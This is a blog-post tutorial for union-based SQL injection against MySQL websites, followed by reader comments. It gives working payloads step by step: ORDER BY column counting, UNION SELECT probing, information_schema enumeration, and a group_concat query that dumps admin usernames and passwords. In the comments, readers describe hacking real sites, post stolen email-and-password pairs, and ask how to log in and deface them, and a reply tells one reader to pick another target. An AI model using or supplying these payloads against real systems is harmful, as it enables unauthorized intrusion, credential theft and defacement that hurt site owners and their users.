Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: order by 1-- order by 2-- order by 3-- order by 4-- order by 5-- If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
Step 3
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example: union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7-- . If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
or if these dont work try...
For example the url would look like: union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
Step 5
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like: UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this: union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Step 7
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this: union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
A very Nice Tutorial Written by Xinapse from
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Assalam-W-Alaikum Bhai,
ReplyDeleteI know u bro i saw ur comments on i think u r also hacking and hacked many Pakistani sites.
This article is really fantastic and helpful also but have 1 query bhai if u could help me out @@ @@ this is vulnerable link i got admin and pass but unable to login in @@ @@ AND @@ @@
It,s admin page is not
ReplyDeleteadmin page is
and email and passwords are
[email protected] password 123456
[email protected] password sabeena
[email protected] password HXoPKGz616
but it seems there is a problem with Login
Because all passwords are changed,
Very nice effort basil0011,always be ethical
keep visiting
Thanks Sir for reply agar yahi site aap hack kare to hack ho sacti hai???
ReplyDeleteya maine hi galti ki hai ya?
hi sir i have a special problem..i attack on a site and then find his user name and pass by sql injection attack..then i find his admin page..but admin page does not loads... i tested a lot of admin pages of other sites but all of they does not loads.....the admin page of site that i hacked is how you hack and deface the sites.....????? its not possible..plz reply
ReplyDelete@ sobia
ReplyDeleteadmin of this site is aware from hackers
he edit this page with world what up dog and then ip address,
leave this site find another one.
or if you have better skills then you can still hack this site,
Adnan Anjum
how can i hack this site even its admin page is not loaded plz tell the name of method....thanks for your reply
ReplyDeletehi sir,
ReplyDeletesome time we got a vulnerable link and after using this command order by 1-- ,2-- up to 12 -- we got a error meand that getting a collum using by union all select 1to 11 but in this we cant getting number of table_names number on disply why ?